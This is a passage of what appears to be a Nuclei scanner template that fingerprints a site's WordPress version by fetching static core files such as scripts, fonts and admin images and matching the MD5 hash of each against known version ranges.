"(\"1f2b7451ea26d4fdf7539197df8438ed\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.hotkeys.js" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"e29483a8ca26a0dd8b0d1146c6b0a6e9\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"a7ad102b68229e728863325d0efec72e\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"e353217d4555ab5c62b367be6889813d\" == md5(body))" - - type: dsl - name: 2.8 - 3.3.3 - dsl: - - "(\"f27ed67b7faedaff1bdaaad859692e6a\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"dfdd8d2cc9be955dbb8dd14aae1daf40\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfobject.js" - matchers: - - type: dsl - name: 3.3.2 - 5.6 - dsl: - - "(\"9ffdba2cff497d701684657e329871f5\" == md5(body))" - - type: dsl - name: 3.0 - 3.3.1 - dsl: - - "(\"892a543f3abb54e8ec1ada55be3b0649\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"eaa5417940c71f441b016b12c534665d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/bigplay.svg" - matchers: - - type: dsl - name: 4.4 - 4.8.15 - dsl: - - "(\"746c3af7a145a09239a36e5ef61cfea0\" == md5(body))" - - type: dsl - name: 4.0 - 4.3.25 - dsl: - - "(\"ea090d716dd05e4024c29283f3c88d0d\" == md5(body))" - - type: dsl - name: 3.6 - 3.9.33 - dsl: - - "(\"d71b376560d2d95d10a4017a2178d0d5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/froogaloop.min.js" - matchers: - - type: dsl - name: 4.2 - 4.8.15 - dsl: - - "(\"2a8742c0ac1cdbec23be44a7d4e9a3c9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/bigplay.png" - matchers: - - type: dsl - name: 3.6 - 4.8.15 - dsl: - - "(\"716436fb3df0d29e6b37dd62d952676a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/controls.svg" - matchers: - - type: dsl - name: 3.6 - 4.8.15 - dsl: - - "(\"40f56f5a736da4effeb790cedb8a52f0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/jumpforward.png" - matchers: - - type: dsl - name: 4.4 - 4.8.15 - dsl: - - "(\"15e1ac8cbacc2efdf1ac2677de48a253\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/controls.png" - matchers: - - type: dsl - name: 3.6 - 4.8.15 - dsl: - - "(\"24a0227fbdd3acfd86ff03fc3fc6c8a4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/loading.gif" - matchers: - - type: dsl - name: 3.6 - 4.8.15 - dsl: - - "(\"76b326f4d44222126fee21076595bef5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/background.png" - matchers: - - type: dsl - name: 3.6 - 4.8.15 - dsl: - - "(\"703c659e4bf563a05c6338a1727e006c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/skipback.png" - matchers: - - type: dsl - name: 4.1 - 4.8.15 - dsl: - - "(\"cd6dc830eb45b3a5a96bbc936ff54846\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/silverlightmediaelement.xap" - matchers: - - type: dsl - name: 4.6 - 4.8.4 - dsl: - - "(\"d0e44fd6ecebca46f36d734b3012aa2c\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.12 - dsl: - - "(\"a83ab83a3d43222e4ba77cf96e0074aa\" == md5(body))" - - type: dsl - name: 3.6 - 4.1.21 - dsl: - - "(\"2fb1bc1a7f10d1dd54689a79b4cf53ac\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jcrop/Jcrop.gif" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"5a8bfd37651305bdafbcf2cd51b0254b\" == md5(body))" - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"7a4b4c6ebdb549fcbe47408f9457493e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.min.css" - matchers: - - type: dsl - name: 3.7 - 5.6 - dsl: - - "(\"56cc9ea201dc2f4b910e78bfacac9211\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"1a6073b9ad2ed6318c1ff41a5aa76c04\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.min.js" - matchers: - - type: dsl - name: 3.7 - 5.6 - dsl: - - "(\"2f61ab984c177275c71e34ff1a17c102\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"23e42f2bd8a5b091d0eb8a80eeb79453\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/colorpicker.js" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"f01017ca562067f4840eb2b6f99f2daf\" == md5(body))" - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"3211fa8ad9b5ff52a438e30c3b7c2998\" == md5(body))" - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"a513cd35728deb3db7dcb9b75da0a62d\" == md5(body))" - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"b21badaea40428ee61a1cddc35b28fdc\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"760027c77e89c0a3761ddadb877b43b6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff" - matchers: - - type: dsl - name: 4.5 - 5.6 - dsl: - - "(\"7e0c88f02dcaf2f78c90b4dc7827b709\" == md5(body))" - - type: dsl - name: 4.2 - 4.4.24 - dsl: - - "(\"d725b287d3d6816c20520a31924fde17\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"ebcf371dc5ff2088a4fe411ee8681466\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg" - matchers: - - type: dsl - name: 4.6 - 5.6 - dsl: - - "(\"a2a1f732cc34764c684ed521c6f3327c\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"dfbe5c48845df8f039028b5a14a9a611\" == md5(body))" - - type: dsl - name: 4.2 - 4.4.24 - dsl: - - "(\"473611093dd8089b0ed33c199725a723\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"7f65dde79eb89e98aa8dbe67fa5febc2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot" - matchers: - - type: dsl - name: 4.5 - 5.6 - dsl: - - "(\"12d26c285b71d790f4b0c94423ef1f99\" == md5(body))" - - type: dsl - name: 4.2 - 4.4.24 - dsl: - - "(\"e33420c71c1a5c429069874d1de98a8b\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"6f2ff03edaa59c1a94be0874d08971ee\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf" - matchers: - - type: dsl - name: 4.5 - 5.6 - dsl: - - "(\"28806940c647cf671bebf4ae0630e570\" == md5(body))" - - type: dsl - name: 4.2 - 4.4.24 - dsl: - - "(\"b86135446ecf06e0ac722d6d8f403550\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"daa52e28bfd88f5fb5587f17e51a1325\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/img/loader.gif" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"394bafc3cc4dfb3a0ee48c1f54669539\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/img/trans.gif" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/img/object.gif" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"f3726450d7457d750a2f4d9441c7ee20\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"abd3613571800fdcc891181d5f34f840\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"552cfb3a29ac01a0d88b0422c5517159\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/embedded.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"f58daaa070dd4ea21bd6790f7ec36e22\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"56df04f9ee495d730f2dfa40e25773cd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"6c2cd70b1c8972cf25b85e1e78a5251e\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"02d304f1d603ee26a48d87d9a1361b34\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"7852de09ac59b5589ed4dbdda4e4dee6\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"729f6aed63765d3887313825b7159612\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/gallery.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"a1065fb19f8c105077f9b4501055db34\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"52d0c08fe45aca3f662e81c738f5e209\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/video.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"d0c2b6f7a042a93d0d7abb1e83336ac1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"a56c7a563660776d5a421c730b8dcfd6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/more.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"fcb7bcd40abc0a6d003bfc0fcbabe67a\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"6071a32f55470b99fda01bf6aedd20f9\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"5e93c2cc3619a9f9eaec32a5032a078e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"1ecaee31ec029ded0e18f576958a5214\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"7bce36bf2355513af7917c193e23ebd6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/audio.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"377e21e6dfe0008ef7c6d4fd2208770b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"e449e3da6dc51f85fc4c571179dd9348\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"24547f5689e6595dc6a12892296373a9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/utils/form_utils.js" - matchers: - - type: dsl - name: 4.8 - 5.6 - dsl: - - "(\"bf88fc6ca25582825493849f19fa4c69\" == md5(body))" - - type: dsl - name: 4.3 - 4.7.19 - dsl: - - "(\"f9c61354383f5a50a9a77b902dfdae7f\" == md5(body))" - - type: dsl - name: 3.9 - 4.2.29 - dsl: - - "(\"a32d1bbc44057b7dd0d2776ba2826b7c\" == md5(body))" - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"337d7e2efe224c1c7da72d40b612d0a6\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"13541f120c5fa567e36f8e10d6ddcfed\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"e33f3bde78ed04cd3039cd41c669f0c7\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"950d229c37a570fc26a13da71d73f9b8\" == md5(body))" - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"5608617efb4362005e16dc09e876192c\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"dfd2287b76c0dc5f2318662c6472401c\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"d823ee2d04bfe2203a8d96392988db6d\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"2c31e4a356777665e4cf2c586e01bd17\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/utils/editable_selects.js" - matchers: - - type: dsl - name: 4.8 - 5.6 - dsl: - - "(\"a14a93897132a4a24927c64a9739ff45\" == md5(body))" - - type: dsl - name: 4.3 - 4.7.19 - dsl: - - "(\"eb642a0aba7a8666a7b1472230fcb374\" == md5(body))" - - type: dsl - name: 3.9 - 4.2.29 - dsl: - - "(\"79087fabcb00132181650bd80666c085\" == md5(body))" - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"8dd04768a81d784fbac5bb00876e808e\" == md5(body))" - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"eae99e787007eaee6a7919bc2417f63a\" == md5(body))" - - type: dsl - name: 2.6 - 3.0.6 - dsl: - - "(\"6ae9d8d2ae563c29652b41b0ace13cc1\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"76f55e77dacb5ce55fb60ff56080d14c\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"80aeaa5b1ec8578fad591212a75d4b1a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/license.txt" - matchers: - - type: dsl - name: 4.8 - 5.6 - dsl: - - "(\"6f9589e0c8df783acd1760d203bafffa\" == md5(body))" - - type: dsl - name: 3.2 - 4.7.19 - dsl: - - "(\"045d04e17422d99e338da75b9c749b7c\" == md5(body))" - - type: dsl - name: 2.1 - 3.1.4 - dsl: - - "(\"0571cf371683742c14f1735079a78e38\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"05e4631bdeac86095c93799f91d1a45d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/crop/cropper.css" - matchers: - - type: dsl - name: 3.6 - 5.6 - dsl: - - "(\"6b79350bf46e0f692a4d1b2807ed0399\" == md5(body))" - - type: dsl - name: 2.1 - 3.5.2 - dsl: - - "(\"de9cb42ec723c60deb69440104800c22\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/crop/marqueeVert.gif" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"ae9accf100a4b9930639adff52d4dcc7\" == md5(body))" - - type: dsl - name: 2.1 - 3.4.2 - dsl: - - "(\"2b2adfe6df6517f146b5b7c5b86eda42\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/crop/marqueeHoriz.gif" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"8cccae9c1ebafdb83be602e4d44c6f0a\" == md5(body))" - - type: dsl - name: 2.1 - 3.4.2 - dsl: - - "(\"9b4c27fccf817923f59b78fa6099c376\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/crop/cropper.js" - matchers: - - type: dsl - name: 2.1 - 5.6 - dsl: - - "(\"1d97b296d918482e1273c56fbff6a8e2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/marker.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"3313dc2a4f322fd43349329cfde8191e\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"3e9aa4c85a09fe868e23d2ffb260df46\" == md5(body))" - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"4f932ddbee5d5e9ebd89a2ec63eda2d1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/align-center-2x.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"9ebeb22df3728735042a4a37a1496611\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/icons32.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"d1dbac5be76d39851ce74aa134cc1aea\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"db0235502fde48e086e206c574c8adae\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"08ec8b870b908c7568ca488dca99efe6\" == md5(body))" - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"a2f0d6d446fe3352c8d99267d5618de6\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"23c825ff877459a4339cf7a7b2258141\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/se.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"d6c89442c360bd1e08da2e7d1527373a\" == md5(body))" - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"e9b50c73bfb3dc46a1eccf07f4bfc6ab\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-2x.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"6a47fff5fee2f97bbf3eaf5e3b2482d3\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"197eb3dfa27be4df10b35a57c0a7dde7\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"d88281faf9c249027c6d2a8991c9ffb5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-vs-2x.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"4aa85a0c593cf769c7185911ae8462f8\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"a1331c4faa15c8d6fcb800eeec4c5500\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/post-formats32.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"57597e8f4f92f87bf02b5f4c896b453b\" == md5(body))" - - type: dsl - name: 3.6 - 4.0.32 - dsl: - - "(\"fbbcf81a2b6ce7e9e419fb639a8a2a24\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/stars.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"5bace01f99903e3cf56bb27bd2ec2891\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"9110d8c847f942a166db598574a118c7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/align-right.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"42d8f3e2874f6523d36c403a502b2276\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"f1c033dd4d0600bf18af7ed9a7441ea5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/stars-2x.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"f5ea4194a79c23e653b24d0c65032e5e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/post-formats32-vs.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"b7742e45b6adea3547a54e1af3fe761c\" == md5(body))" - - type: dsl - name: 3.6 - 4.0.32 - dsl: - - "(\"b6c98d25500180cc6604d155f67651f7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/imgedit-icons.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"4bd55c320b9fd9d8127da94789693b4f\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"45cbcb9891d6bcbf796e50fb6a6112db\" == md5(body))" - - type: dsl - name: 2.9 - 3.4.2 - dsl: - - "(\"fece88d437aba60350bce5273d4f1472\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/align-left.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"5cfd7930cffa6412f75af26f2e689ed4\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"731f8ceb9ea5cf3ad41810cf0af73821\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wordpress-logo.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"c6b0f979b9e66fc338f4cb3853a5608a\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"a0baa50b279b79280c94acb65eb2426c\" == md5(body))" - - type: dsl - name: 2.5 - 3.3.3 - dsl: - - "(\"1a77b8aa7318b3e3b99e103aac47e448\" == md5(body))" - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"cc26f690d72afe4f2432d720e8fc6658\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/icons32-2x.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"b525a42af908fafcf8cc07679ab4fabb\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"749a56fae96141ff576bb99c4037ebd9\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"9de25e2c0691e2662252640d68a58a86\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/list.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"1e123e96bd2a1ce2c0d3b305d153f1c3\" == md5(body))" - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"cce19b15b4d3e4ad7dac568f1a1c1f90\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/w-logo-white.png" - matchers: - - type: dsl - name: 4.5 - 5.6 - dsl: - - "(\"6ea6ccee4a0176dba27ebb79ac175c85\" == md5(body))" - - type: dsl - name: 3.9 - 4.4.24 - dsl: - - "(\"af2ae1a60e2c4bdbec69fe6c87c63cad\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"d8d9f723f8f5254709712eb12ad74040\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/arrows-2x.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"972051f086017dcef17964622336840b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/align-right-2x.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"6883026cbd3e72ba5da36c57c60fc078\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/align-none-2x.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"f858439905295bd705b09b2dba3418bd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/media-button-2x.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"23db5749e51d85105cb8d03fc81305c9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/icons32-vs-2x.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"a12a3034ff4734469709265a83697d22\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"4487c15d43389e88b3694803e2beaeb7\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"070f2b5a2faa29998e2ce1a91f0508d9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/align-center.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"09d91addb6b53479e68c645931d9658e\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"a1427c5dd8d6f9292430f6650824270a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/align-none.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"f1ad65716432a0a1da7591a5c2f10d04\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"de2bd2479bc66930d4db049e91b7451a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/arrows.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"7fda76920124f03e88d1dfd93e03bf59\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"9e6974860b99cef7eeb3b90e9e87f26a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/generic.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"f88e1b95ff278a5b231f39380b211ed0\" == md5(body))" - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"ec85cdf6efc2a983e50f7d86a976c467\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wordpress-logo.svg" - matchers: - - type: dsl - name: 4.2 - 5.6 - dsl: - - "(\"f34ef6259364f7ef0ccf67cd1dddc970\" == md5(body))" - - type: dsl - name: 3.8 - 4.1.32 - dsl: - - "(\"b4419d2f79449b65dfe7036ef91cd1e8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/browser.png" - matchers: - - type: dsl - name: 4.3 - 5.6 - dsl: - - "(\"c1b2f9c29eb54b1f5c0284629524fe46\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/browser-rtl.png" - matchers: - - type: dsl - name: 4.6 - 5.6 - dsl: - - "(\"442291d9d3a041e41aaefebfbf25cc9d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/yes.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"c42bf814a237dc89970d715ae8516b13\" == md5(body))" - - type: dsl - name: 2.6 - 3.4.2 - dsl: - - "(\"94040f30512d9d0993f0b903b25024e2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"e10d8139230f1f8b64f35960098f8cff\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"48b8c0d56811b724ea34d7f052a126b3\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"dc29872da04b485add10ad8bd5c2e12b\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"a6bc94f353aca3414b8d5eff539e4015\" == md5(body))" - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"398887656a35c9956217380dc4e32d8c\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"1a36e748b6be3b15dfaa18b2149beefe\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"64327786ea2b3ac2bb12f54c698e5221\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/imgedit-icons-2x.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"2ce3ee2783a33655a6bdfd9dc3cce174\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"22675b63c33b6e9b2a63e84018f44a0e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/align-left-2x.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"698538b14fb9839aecd01d5e97c66316\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/comment-grey-bubble-2x.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"9d5459d3c59d32b602732c0df56d83bf\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"e1334238affb186ad35b2a79f8739e94\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/comment-grey-bubble.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"8f59128f2a27b489b0a974c0b6b21046\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 